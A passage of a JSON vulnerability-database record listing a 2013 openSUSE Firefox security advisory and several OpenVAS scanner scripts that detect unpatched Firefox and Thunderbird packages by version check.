"CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1688", "CVE-2013-1686", "CVE-2013-1698", "CVE-2013-1682", "CVE-2013-1683", "CVE-2013-1699", "CVE-2013-1693"], "description": "MozillaFirefox was updated to Firefox 22.0 (bnc#825935)\n\n Following security issues were fixed:\n * MFSA 2013-49/CVE-2013-1682/CVE-2013-1683 Miscellaneous\n memory safety hazards\n * MFSA 2013-50/CVE-2013-1684/CVE-2013-1685/CVE-2013-1686\n Memory corruption found using Address Sanitizer\n * MFSA 2013-51/CVE-2013-1687 (bmo#863933, bmo#866823)\n Privileged content access and execution via XBL\n * MFSA 2013-52/CVE-2013-1688 (bmo#873966) Arbitrary code\n execution within Profiler\n * MFSA 2013-53/CVE-2013-1690 (bmo#857883) Execution of\n unmapped memory through onreadystatechange event\n * MFSA 2013-54/CVE-2013-1692 (bmo#866915) Data in the\n body of XHR HEAD requests leads to CSRF attacks\n * MFSA 2013-55/CVE-2013-1693 (bmo#711043) SVG filters can\n lead to information disclosure\n * MFSA 2013-56/CVE-2013-1694 (bmo#848535) PreserveWrapper\n has inconsistent behavior\n * MFSA 2013-57/CVE-2013-1695 (bmo#849791) Sandbox\n restrictions not applied to nested frame elements\n * MFSA 2013-58/CVE-2013-1696 (bmo#761667) X-Frame-Options\n ignored when using server push with multi-part responses\n * MFSA 2013-59/CVE-2013-1697 (bmo#858101) XrayWrappers\n can be bypassed to run user defined methods in a\n privileged context\n * MFSA 2013-60/CVE-2013-1698 (bmo#876044) getUserMedia\n permission dialog incorrectly displays location\n * MFSA 2013-61/CVE-2013-1699 (bmo#840882) Homograph\n domain spoofing in .com, .net and .name\n\n", "edition": 1, "modified": "2013-07-04T12:04:29", "published": "2013-07-04T12:04:29", "id": "OPENSUSE-SU-2013:1142-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00005.html", "type": "suse", "title": "MozillaFirefox: Update to Firefox 22.0 release (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], 
"openvas": [{"lastseen": "2017-07-02T21:11:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1693"], "description": "This host is installed with Mozilla Thunderbird ESR and is prone to multiple\n vulnerabilities.", "modified": "2017-05-11T00:00:00", "published": "2013-06-26T00:00:00", "id": "OPENVAS:903221", "href": "http://plugins.openvas.org/nasl.php?oid=903221", "type": "openvas", "title": "Mozilla Thunderbird ESR Multiple Vulnerabilities - June 13 (Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_mozilla_thunderbird_esr_mult_vuln_jun13_macosx.nasl 6104 2017-05-11 09:03:48Z teissa $\n#\n# Mozilla Thunderbird ESR Multiple Vulnerabilities - June 13 (Mac OS X)\n#\n# Authors:\n# Arun Kallavi <karun@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to execute arbitrary code,\n obtain potentially sensitive information, gain escalated privileges, bypass\n security restrictions, and perform unauthorized actions. Other attacks may\n also be possible.\n Impact Level: Application\";\n\ntag_affected = \"Thunderbird ESR version 17.x before 17.0.7 on Mac OS X\";\ntag_insight = \"Multiple flaws due to,\n - PreserveWrapper does not handle lack of wrapper.\n - Error in processing of SVG format images with filters to read pixel values.\n - Does not prevent inclusion of body data in XMLHttpRequest HEAD request.\n - Multiple unspecified vulnerabilities in the browser engine.\n - Does not properly handle onreadystatechange events in conjunction with\n page reloading.\n - System Only Wrapper (SOW) and Chrome Object Wrapper (COW), does not\n restrict XBL user-defined functions.\n - Use-after-free vulnerability in 'nsIDocument::GetRootElement' and\n 'mozilla::dom::HTMLMediaElement::LookupMediaElementURITable' functions.\n - XrayWrapper does not properly restrict use of DefaultValue for method calls.\";\ntag_solution = \"Upgrade to Thunderbird ESR 17.0.7 or later,\n http://www.mozilla.org/en-US/thunderbird\";\ntag_summary = \"This host is installed with Mozilla Thunderbird ESR and is prone to multiple\n vulnerabilities.\";\n\nif(description)\n{\n script_id(903221);\n script_version(\"$Revision: 6104 $\");\n script_cve_id( \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\",\n \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\",\n \"CVE-2013-1697\", \"CVE-2013-1692\");\n 
script_bugtraq_id(60766, 60773, 60774, 60777, 60778, 60783, 60787, 60776, 60784,\n 60765);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-05-11 11:03:48 +0200 (Thu, 11 May 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-26 18:40:17 +0530 (Wed, 26 Jun 2013)\");\n script_name(\"Mozilla Thunderbird ESR Multiple Vulnerabilities - June 13 (Mac OS X)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/53970\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1028702\");\n script_xref(name : \"URL\" , value : \"http://www.mozilla.org/security/announce/2013/mfsa2013-50.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"ThunderBird-ESR/MacOSX/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n# Thunderbird Check\ntbVer = \"\";\ntbVer = get_kb_item(\"ThunderBird-ESR/MacOSX/Version\");\n\nif(tbVer && tbVer =~ \"^17.0\")\n{\n # Grep for Thunderbird version\n if(version_in_range(version:tbVer, test_version:\"17.0\", test_version2:\"17.0.6\"))\n {\n security_message(0);\n exit(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:28", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", 
"CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310881755", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881755", "type": "openvas", "title": "CentOS Update for firefox CESA-2013:0981 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2013:0981 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881755\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:58:18 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for firefox CESA-2013:0981 centos6\");\n\n script_xref(name:\"CESA\", value:\"2013:0981\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-June/019808.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. 
XULRunner provides the XUL\n Runtime environment for Mozilla Firefox.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause Firefox to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685, CVE-2013-1686,\n CVE-2013-1687, CVE-2013-1690)\n\n It was found that Firefox allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Firefox processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Firefox implemented some of its internal\n structures (called wrappers). An attacker could use these flaws to bypass\n some restrictions placed on them. This could lead to unexpected behavior or\n a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n For technical details regarding these flaws, refer to the Mozilla\n security advisories for Firefox 17.0.7 ESR. You can find a link to the\n Mozilla advisories in the References section of this erratum.\n\n All Firefox users should upgrade to these updated packages, which contain\n Firefox version 17.0.7 ESR, which corrects these issues. 
After installing\n the update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~17.0.7~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-26T11:09:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Check for the Version of MozillaThunderbird", "modified": "2018-01-26T00:00:00", "published": "2013-11-19T00:00:00", "id": "OPENVAS:850495", "href": "http://plugins.openvas.org/nasl.php?oid=850495", "type": "openvas", "title": "SuSE Update for MozillaThunderbird openSUSE-SU-2013:1141-1 (MozillaThunderbird)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_1141_1.nasl 8542 2018-01-26 06:57:28Z teissa $\n#\n# SuSE Update for MozillaThunderbird openSUSE-SU-2013:1141-1 (MozillaThunderbird)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850495);\n script_version(\"$Revision: 8542 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-26 07:57:28 +0100 (Fri, 26 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-19 14:06:01 +0530 (Tue, 19 Nov 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for MozillaThunderbird openSUSE-SU-2013:1141-1 (MozillaThunderbird)\");\n\n tag_insight = \"\n MozillaThunderbird was updated to Thunderbird 17.0.7\n (bnc#825935)\n\n Security issues fixed:\n * MFSA 2013-49/CVE-2013-1682 Miscellaneous memory safety\n hazards\n * MFSA 2013-50/CVE-2013-1684/CVE-2013-1685/CVE-2013-1686\n Memory corruption found using Address Sanitizer\n * MFSA 2013-51/CVE-2013-1687 (bmo#863933, bmo#866823)\n Privileged content access and execution via XBL\n * MFSA 2013-53/CVE-2013-1690 (bmo#857883) Execution of\n unmapped memory through onreadystatechange event\n * MFSA 2013-54/CVE-2013-1692 (bmo#866915) Data in the\n body of XHR HEAD requests leads to CSRF attacks\n * MFSA 2013-55/CVE-2013-1693 (bmo#711043) SVG filters can\n lead to information disclosure\n * MFSA 2013-56/CVE-2013-1694 (bmo#848535) PreserveWrapper\n has inconsistent behavior\n * MFSA 2013-59/CVE-2013-1697 
(bmo#858101) XrayWrappers\n can be bypassed to run user defined methods in a\n privileged contex\";\n\n tag_affected = \"MozillaThunderbird on openSUSE 12.2\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"openSUSE-SU\", value: \"2013:1141_1\");\n script_tag(name: \"summary\" , value: \"Check for the Version of MozillaThunderbird\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird\", rpm:\"MozillaThunderbird~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-buildsymbols\", rpm:\"MozillaThunderbird-buildsymbols~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-debuginfo\", rpm:\"MozillaThunderbird-debuginfo~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-debugsource\", rpm:\"MozillaThunderbird-debugsource~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-devel\", 
rpm:\"MozillaThunderbird-devel~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-devel-debuginfo\", rpm:\"MozillaThunderbird-devel-debuginfo~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-translations-common\", rpm:\"MozillaThunderbird-translations-common~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"MozillaThunderbird-translations-other\", rpm:\"MozillaThunderbird-translations-other~17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"enigmail\", rpm:\"enigmail~1.5.1+17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"enigmail-debuginfo\", rpm:\"enigmail-debuginfo~1.5.1+17.0.7~49.47.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310881756", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881756", "type": "openvas", "title": "CentOS Update for thunderbird CESA-2013:0982 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS 
Update for thunderbird CESA-2013:0982 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881756\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:58:50 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for thunderbird CESA-2013:0982 centos5\");\n\n script_xref(name:\"CESA\", value:\"2013:0982\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-June/019817.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\n Several flaws were found in the processing of malformed content. Malicious\n content could cause Thunderbird to crash or, potentially, execute arbitrary\n code with the privileges of the user running Thunderbird. (CVE-2013-1682,\n CVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\n It was found that Thunderbird allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Thunderbird processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Thunderbird implemented some of its\n internal structures (called wrappers). An attacker could use these flaws to\n bypass some restrictions placed on them. This could lead to unexpected\n behavior or a potentially exploitable crash. 
(CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n Note: All of the above issues cannot be exploited by a specially-crafted\n HTML mail message as JavaScript is disabled by default for mail messages.\n They could be exploited another way in Thunderbird, for example, when\n viewing the full remote content of an RSS feed.\n\n All Thunderbird users should upgrade to this updated package, which\n contains Thunderbird version 17.0.7 ESR, which corrects these issues. After\n installing the update, Thunderbird must be restarted for the changes to\n take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310881757", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881757", "type": "openvas", "title": "CentOS Update for thunderbird CESA-2013:0982 centos6", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2013:0982 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881757\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:59:18 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for thunderbird CESA-2013:0982 centos6\");\n\n script_xref(name:\"CESA\", value:\"2013:0982\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-June/019807.html\");\n script_tag(name:\"summary\", 
value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\n Several flaws were found in the processing of malformed content. Malicious\n content could cause Thunderbird to crash or, potentially, execute arbitrary\n code with the privileges of the user running Thunderbird. (CVE-2013-1682,\n CVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\n It was found that Thunderbird allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Thunderbird processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Thunderbird implemented some of its\n internal structures (called wrappers). An attacker could use these flaws to\n bypass some restrictions placed on them. This could lead to unexpected\n behavior or a potentially exploitable crash. 
(CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n Note: All of the above issues cannot be exploited by a specially-crafted\n HTML mail message as JavaScript is disabled by default for mail messages.\n They could be exploited another way in Thunderbird, for example, when\n viewing the full remote content of an RSS feed.\n\n All Thunderbird users should upgrade to this updated package, which\n contains Thunderbird version 17.0.7 ESR, which corrects these issues. After\n installing the update, Thunderbird must be restarted for the changes to\n take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", 